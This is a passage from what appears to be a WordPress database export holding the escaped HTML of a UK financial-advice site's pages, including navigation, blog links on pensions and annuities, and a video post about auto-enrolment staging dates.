<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"/g-day-impact-gender-directive-insurance\">&#13;\n										<img width=\"52\" height=\"21\" src=\"/wp-content/uploads/2012/09/headline-image-composite-preview.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"headline-image-composite-preview\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/g-day-impact-gender-directive-insurance\">G-day – Impact of the Gender Directive on Insurance</a>&#13;\n									<div class=\"meta\">&#13;\n										September 18th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"/what-does-a-wealth-managerdo\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/what-does-a-wealth-managerdo\">What Does a Wealth Manager Do?</a>&#13;\n									<div class=\"meta\">&#13;\n										September 5th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n															<div id=\"tab-recent\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\n									<div class=\"meta\">&#13;\n										June 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"/5-facts-know-annuities\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/5-facts-know-annuities\">5 Facts You Should Know About Annuities</a>&#13;\n									<div class=\"meta\">&#13;\n										June 9th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/new-individual-savings-accounts-qa\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/automatic-enrolment\">What is Automatic Enrolment</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/staging-date-social-advisors\">When is your Staging Date Social Advisors</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n														</div>&#13;\n			</div>&#13;\n		</div>&#13;\n		</div><div id=\"categories-3\" class=\"widget widget_categories\"><div class=\"heading\"><p>Post Categories</p></div><select name=\"cat\" id=\"cat\" class=\"postform\"><option value=\"-1\">Select Category</option><option class=\"level-0\" value=\"13\">Annuities  (2)</option><option class=\"level-0\" value=\"8\">Insurance Protection  (5)</option><option class=\"level-0\" value=\"5\">Investments  (3)</option><option class=\"level-0\" value=\"4\">Pensions  (9)</option><option class=\"level-0\" value=\"6\">Trusts  (1)</option><option class=\"level-0\" value=\"33\">Video  (4)</option><option class=\"level-0\" value=\"1\">Wealth Management  (17)</option></select><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\n	var dropdown = document.getElementById(\"cat\");\r\n	function onCatChange() {\r\n		if ( dropdown.options[dropdown.selectedIndex].value > 0 ) {\r\n			location.href = \"http://www.equalitywalk.org.uk/?cat=\"+dropdown.options[dropdown.selectedIndex].value;\r\n		}\r\n	}\r\n	dropdown.onchange = onCatChange;\r\n/* ]]]]><![CDATA[> */\r\n]]></script></div><div id=\"social_links-widget-2\" class=\"widget social_links\"><div class=\"heading\"><p>Get Social</p></div>		<ul class=\"social-networks  clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"http://feeds.feedburner.com/Equity SMART\" target=\"_blank\" rel=\"nofollow\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"_blank\" rel=\"nofollow\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																								</ul></div><div id=\"text-23\" class=\"widget widget_text\">			<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/14392e473f72a2%3A125d9572eb46dc/5699942098141184/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"><img src=\"/WcBxvj97f6ImTTzlT4h-unuce5ZXpmlrf0JzFKpvBWJyilIlbrxaszuw0Y2NMVq3U1GZSw9_oe6GL-pXCIamWAg_s0.jpg\"/></a><script type=\"text/javascript\" src=\"/leadbox-690.js\"/></div>&#13;\n		</div></div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Our Latest Posts</p>		<ul><li>&#13;\n				<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/5-facts-know-annuities\">5 Facts You Should Know About Annuities</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/new-individual-savings-accounts-qa\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/automatic-enrolment\">What is Automatic Enrolment</a>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"contact_info-widget-2\" class=\"footer-widget-col contact_info\"><p>Contact Info</p>		<div class=\"contact-info-container\">&#13;\n				<p class=\"address\">Manchester &amp; London</p>&#13;\n		&#13;\n				<p class=\"phone\">Phone: </p>&#13;\n		&#13;\n		&#13;\n		&#13;\n				<p class=\"email\">Email: <a href=\"mailto:enquiries@equalitywalk.org.uk\">Click To Email</a></p>&#13;\n		&#13;\n				&#13;\n				</div>&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"text-22\" class=\"footer-widget-col widget_text\"><p>Download Your FREE Retirement Guides</p>			<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/1435eb973f72a2%3A125d9572eb46dc/5753952654065664/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"><img src=\"/w3QPpbD3DJXcyqPrBaexcUOnTpQKlOX0XuzNYejlD3Hwl1wrM5qbyjoyp4eUJt-wEdlJsAojFjru39Y0ZjrDnA_s0.jpg\"/></a><script type=\"text/javascript\" src=\"/leadbox-689.js\"/></div>&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col last\"/></section></div>&#13;\n	</footer><footer id=\"footer\"><div class=\"avada-row\"/>&#13;\n	</footer></div><!-- wrapper -->&#13;\n	&#13;\n	<script type=\"text/javascript\" src=\"/maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[\r\njQuery(window).load(function() {\r\n\r\njQuery( \'#wooslider-id-1\' ).flexslider2({namespace: \"wooslider-\"\r\n, animation: \'fade\', slideshowSpeed: 7000, animationSpeed: 600, slideshow: true, directionNav: true, keyboard: false, mousewheel: false, pausePlay: false, randomize: false, animationLoop: true, pauseOnAction: true, pauseOnHover: false, smoothHeight: false, touch: true, controlNav: true});\r\n\r\n});\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.form.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\",\"cached\":\"1\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/swfupload.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"/wp-includes/js/comment-reply.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\",\"mobile_nav_cart\":\"Shopping Cart\",\"page_smoothHeight\":\"false\",\"flex_smoothHeight\":\"false\",\"language_flag\":\"ICL_LANGUAGE_CODE\",\"infinite_blog_finished_msg\":\"<em>All posts displayed</em>\",\"infinite_blog_text\":\"<em>Loading the next set of posts...</em>\",\"portfolio_loading_text\":\"<em>Loading Portfolio Items...</em>\",\"faqs_loading_text\":\"<em>Loading FAQ Items...</em>\",\"order_actions\":\"Details\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/main.js\"/></body>','&#13;\n	Smart Money: Nov-Dec','','publish','closed','closed','','smart-money-nov-dec','','','2017-09-21 16:34:40','2017-09-21 16:34:40','',0,'http://www.equalitywalk.org.uk/smart-money-nov-dec',0,'page','',0),(106,1,'2017-09-21 16:34:41','2017-09-21 16:34:41','<body class=\"single single-post postid-8760 single-format-video light  wpb-js-composer js-comp-ver-4.1.2 vc_responsive\" data-spy=\"scroll\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n								<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v3\">&#13;\n		&#13;\n		<header id=\"header\"><div class=\"avada-row\" style=\"margin-top:0px;margin-bottom:0px;\">&#13;\n			<div class=\"logo\" style=\"margin-right:0px;margin-top:15px;margin-left:0px;margin-bottom:15px;\">&#13;\n				<a href=\"/\">&#13;\n					&#13;\n									</a>&#13;\n			</div>&#13;\n						<nav id=\"nav\" class=\"nav-holder\"><ul class=\"navigation menu fusion-navbar-nav\"><li id=\"menu-item-7214\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-7214 fusion-dropdown-menu\"><a href=\"../wealth-management/\">Wealth Management</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44 fusion-dropdown-submenu\"><a href=\"../wealth-platform/\">Wealth Platform</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-27 fusion-megamenu-menu\"><a href=\"../pensions/\">Pensions</a>&#13;\n<div class=\"fusion-megamenu-wrapper columns-3 col-span-12 container\"><div class=\"row\">&#13;\n&#13;\n<ul class=\"fusion-megamenu-holder\"><ul class=\"fusion-megamenu \"><li id=\"menu-item-8353\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8353 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">Pensions&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6154\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6154\"><a href=\"../pensions/pension-review/\"><span class=\"fusion-megamenu-bullet\"/>Pension Review</a></li>&#13;\n		<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-95\"><a href=\"../pensions/sipps/\"><span class=\"fusion-megamenu-bullet\"/>SIPPS</a></li>&#13;\n		<li id=\"menu-item-967\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-967\"><a href=\"../pensions/pension-release/\"><span class=\"fusion-megamenu-bullet\"/>Pension Release</a></li>&#13;\n		<li id=\"menu-item-741\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-741\"><a href=\"../pensions/pension-transfer/\"><span class=\"fusion-megamenu-bullet\"/>Pension Transfer</a></li>&#13;\n		<li id=\"menu-item-6848\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6848\"><a href=\"../tracking-down-your-lost-pension/\"><span class=\"fusion-megamenu-bullet\"/>Lost Pension</a></li>&#13;\n	</ul></h3></li>&#13;\n	<li id=\"menu-item-8579\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8579 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">At Retirement&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-139\"><a href=\"../pensions/income-drawdown/\"><span class=\"fusion-megamenu-bullet\"/>Income Drawdown</a></li>&#13;\n		<li id=\"menu-item-8599\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-8599\"><a href=\"../best-annuity-rates/\"><span class=\"fusion-megamenu-bullet\"/>Annuities</a></li>&#13;\n		<li id=\"menu-item-8580\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8580\"><div class=\"fusion-megamenu-widgets-container\"><div id=\"wooslider_slideshow_posts-2\" class=\"widget widget_wooslider_slideshow_posts\"><div id=\"wooslider-id-1\" class=\"wooslider wooslider-id-1 wooslider-type-posts wooslider-theme-default\"><ul class=\"slides\"><li class=\"slide\">&#13;\n<div class=\"layout-text-left overlay-none\"><a href=\"http://www.equalitywalk.org.uk/better-pension-drawdown-annuity/\"/><div class=\"slide-excerpt\"><h2 class=\"slide-title\"><a href=\"../better-pension-drawdown-annuity/\">Which is Better Pension Drawdown or Annuity?</a></h2></div></div></li>&#13;\n</ul></div>&#13;\n</div></div></li>&#13;\n	</ul></h3></li>&#13;\n	<li id=\"menu-item-6852\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-6852 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">For Business&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-136\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-136\"><a href=\"../pensions/auto-enrolment-pensions/\"><span class=\"fusion-megamenu-bullet\"/>Auto Enrolment Pensions</a></li>&#13;\n		<li id=\"menu-item-6494\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6494\"><a href=\"../auto-enrolment-report/\"><span class=\"fusion-megamenu-bullet\"/>Auto Enrolment Report</a></li>&#13;\n		<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-133\"><a href=\"../pensions/group-pension-plan/\"><span class=\"fusion-megamenu-bullet\"/>Group Pension Plan</a></li>&#13;\n	</ul></h3></li>&#13;\n&#13;\n</ul></ul><div style=\"clear:both;\"/>&#13;\n</div>&#13;\n</div>&#13;\n</li>&#13;\n<li id=\"menu-item-8624\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8624 fusion-megamenu-menu\"><a>Other Services</a>&#13;\n&#13;\n</li>&#13;\n<li id=\"menu-item-7672\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7672 fusion-dropdown-menu\"><a href=\"../about-us/\">About</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-7676\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7676 fusion-dropdown-submenu\"><a href=\"../our-team/\">Our Team</a></li>&#13;\n	<li id=\"menu-item-7677\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7677 fusion-dropdown-submenu\"><a href=\"../about-us/testimonials/\">Testimonials</a></li>&#13;\n	<li id=\"menu-item-7673\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-7673 fusion-dropdown-submenu\"><a href=\"https://rsr.wrapadviser.co.uk/home.aspx?logout=1\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-menu\',\'http://rsr.wrapadviser.co.uk\']);\">Login</a></li>&#13;\n	<li id=\"menu-item-7680\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7680 fusion-dropdown-submenu\"><a href=\"../terms-of-use/\">Terms Of Use</a></li>&#13;\n	<li id=\"menu-item-7681\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7681 fusion-dropdown-submenu\"><a href=\"../privacy-policy/\">Privacy Policy</a></li>&#13;\n	<li id=\"menu-item-7682\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7682 fusion-dropdown-submenu\"><a href=\"../cookies/\">Cookies</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-7674\" class=\"menu-item menu-item-type-custom menu-item-object-custom current-menu-ancestor menu-item-has-children menu-item-7674 fusion-dropdown-menu\"><a>Blog</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-8734\" class=\"menu-item menu-item-type-custom menu-item-object-custom current-menu-ancestor current-menu-parent menu-item-has-children menu-item-8734 fusion-dropdown-submenu\"><a href=\"../category/video-2/\">Watch Our Blog</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-8732\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8732\"><a href=\"../pension-reforms-offer-freedom-savers/\">Pension Reforms Offer Freedom to Savers</a></li>&#13;\n		<li id=\"menu-item-8771\" class=\"menu-item menu-item-type-post_type menu-item-object-post current-menu-item menu-item-8771\"><a href=\"../staging-date-social-advisors/\">When is your Staging Date?</a></li>&#13;\n		<li id=\"menu-item-8781\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8781\"><a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a></li>&#13;\n		<li id=\"menu-item-8780\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8780\"><a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a></li>&#13;\n	</ul></li>&#13;\n	<li id=\"menu-item-8733\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8733 fusion-dropdown-submenu\"><a href=\"../our-blog/\">Read Our Blog</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-8587\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8587\"><a href=\"../category/annuities/\">Annuities</a></li>&#13;\n		<li id=\"menu-item-8588\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8588\"><a href=\"../category/insurance-protection/\">Insurance Protection</a></li>&#13;\n		<li id=\"menu-item-8589\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8589\"><a href=\"../category\">Investments</a></li>&#13;\n		<li id=\"menu-item-8590\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8590\"><a href=\"../category/pensions/\">Pensions</a></li>&#13;\n		<li id=\"menu-item-8591\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8591\"><a href=\"../category/\">Trusts</a></li>&#13;\n		<li id=\"menu-item-8592\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8592\"><a href=\"../category/wealth-management/\">Wealth Management</a></li>&#13;\n	</ul></li>&#13;\n</ul></li>&#13;\n		</ul></nav><div class=\"mobile-nav-holder main-menu\"/>&#13;\n					</div>&#13;\n	</header></div>		<div class=\"init-sticky-header\"/>&#13;\n		</div>&#13;\n						<div id=\"sliders-container\">&#13;\n									</div>&#13;\n		&#13;\n			<div class=\"page-title-container\">&#13;\n		<div class=\"page-title\">&#13;\n			<div class=\"page-title-wrapper\">&#13;\n				<div class=\"page-title-captions\">&#13;\n										<h1 class=\"entry-title\">&#13;\n										When is your Staging Date Social Advisors										</h1>&#13;\n														</div>&#13;\n															<ul class=\"breadcrumbs\"><li> <a href=\"/\">Home</a></li><li><a href=\"../category/video-2/\" title=\"Video\">Video</a></li><li>When is your Staging Date Social Advisors</li></ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n																			<div id=\"main\" class=\"clearfix \" style=\"\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n		&#13;\n										<div id=\"post-8760\" class=\"post-8760 post type-post status-publish format-video hentry category-video-2 post\">&#13;\n												<span class=\"entry-title\" style=\"display: none;\">When is your Staging Date Social Advisors</span>&#13;\n						<div class=\"post-content\">&#13;\n				<p><iframe class=\"wistia_embed\" src=\"http://fast.wistia.net/embed/iframe/bh6w8neklj\" name=\"wistia_embed\" width=\"640\" height=\"388\" frameborder=\"0\" scrolling=\"no\" allowfullscreen=\"allowfullscreen\"/></p>&#13;\n							</div>&#13;\n									<div class=\"meta-info\">&#13;\n				<div class=\"vcard\">&#13;\n					By <span class=\"fn\"><a href=\"../author/rs-r-admin/\" title=\"Posts by Equity SMART\" rel=\"author\">Equity SMART</a></span><span class=\"sep\">|</span>Categories: <a href=\"../category/video-2/\" title=\"View all posts in Video\" rel=\"category tag\">Video</a><span class=\"sep\">|</span><span class=\"meta-tags\">Tags: </span><span class=\"sep\">|</span><a href=\"../staging-date-social-advisors/\" title=\"Comment on When is your Staging Date Social Advisors\">0 Comments</a>				</div>&#13;\n			</div>&#13;\n												<div class=\"share-box\">&#13;\n				<h4> </h4>&#13;\n				<ul class=\"social-networks social-networks-dark\"><li class=\"facebook\">&#13;\n						<a href=\"http://www.facebook.com/sharer.php?m2w&amp;s=100&amp;p[url]=http://www.equalitywalk.org.uk/staging-date-social-advisors/&amp;p[title]=When%20is%20your%20Staging%20Date%20Social%20Advisors\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Facebook&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Facebook</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"twitter\">&#13;\n						<a href=\"http://twitter.com/home?status=When+is+your+Staging+Date+Social+Advisors%20http://www.equalitywalk.org.uk/staging-date-social-advisors/\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Twitter&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Twitter</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"linkedin\">&#13;\n						<a href=\"http://linkedin.com/shareArticle?mini=true&amp;url=http://www.equalitywalk.org.uk/staging-date-social-advisors/&amp;title=When%20is%20your%20Staging%20Date%20Social%20Advisors\" target=\"_blank\" rel=\"nofollow\">&#13;\n							LinkedIn&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>LinkedIn</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"reddit\">&#13;\n						<a href=\"http://reddit.com/submit?url=http://www.equalitywalk.org.uk/staging-date-social-advisors/&amp;title=When%20is%20your%20Staging%20Date%20Social%20Advisors\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Reddit&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Reddit</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"tumblr\">&#13;\n						<a href=\"http://www.tumblr.com/share/link?url=http%3A%2F%2Fwww.equalitywalk.org.uk%2Fstaging-date-social-advisors%2F&amp;name=When+is+your+Staging+Date+Social+Advisors&amp;description=\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Tumblr&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Tumblr</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"google\">&#13;\n						<a href=\"https://plus.google.com/share?url=http://www.equalitywalk.org.uk/staging-date-social-advisors/\" onclick=\"javascript:window.open(this.href,&#13;&#10;  \'\', \'menubar=no,toolbar=no,resizable=yes,scrollbars=yes,height=600,width=600\');return false;\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Google +1&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Google +1</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"tf-pinterest\">&#13;\n												<a href=\"http://pinterest.com/pin/create/button/?url=http%3A%2F%2Fwww.equalitywalk.org.uk%2Fstaging-date-social-advisors%2F&amp;description=When+is+your+Staging+Date+Social+Advisors&amp;media=\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Pinterest&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Pinterest</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"email\">&#13;\n						<a href=\"mailto:?subject=When is your Staging Date Social Advisors&amp;body=http://www.equalitywalk.org.uk/staging-date-social-advisors/\">&#13;\n							Email&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Email</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n									</ul></div>&#13;\n									<div class=\"about-author\">&#13;\n				<div class=\"title\"><h2>About the Author: <a href=\"../author/rs-r-admin/\" title=\"Posts by Equity SMART\" rel=\"author\">Equity SMART</a></h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div>&#13;\n				<div class=\"about-author-container\">&#13;\n					<div class=\"avatar\">&#13;\n											</div>&#13;\n					<div class=\"description\">&#13;\n											</div>&#13;\n				</div>&#13;\n			</div>&#13;\n			&#13;\n												&#13;\n							&#13;\n<!-- You can start editing here. -->&#13;\n&#13;\n&#13;\n			<!-- If comments are open, but there are no comments. -->&#13;\n&#13;\n	 &#13;\n&#13;\n&#13;\n									<div id=\"respond\" class=\"comment-respond\">&#13;\n				<h3 id=\"reply-title\" class=\"comment-reply-title\"><div class=\"title\"><h2> </h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div> <small><a rel=\"nofollow\" id=\"cancel-comment-reply-link\" href=\"../staging-date-social-advisors/\" style=\"display:none;\">Cancel reply</a></small>&#13;\n									</h3><form action=\"/\" method=\"post\" id=\"commentform\" class=\"comment-form\">&#13;\n																										<div id=\"comment-input\"><input type=\"text\" name=\"author\" id=\"author\" value=\"\" placeholder=\"Name (required)\" size=\"22\" tabindex=\"1\" aria-required=\"true\" class=\"input-name\"/><input type=\"text\" name=\"email\" id=\"email\" value=\"\" placeholder=\"Email (required)\" size=\"22\" tabindex=\"2\" aria-required=\"true\" class=\"input-email\"/></div>&#13;\n												<div id=\"comment-textarea\"/>												<p class=\"form-submit\">&#13;\n							<input name=\"submit\" type=\"submit\" id=\"comment-submit\" value=\"Post Comment\"/><input type=\"hidden\" name=\"comment_post_ID\" value=\"8760\" 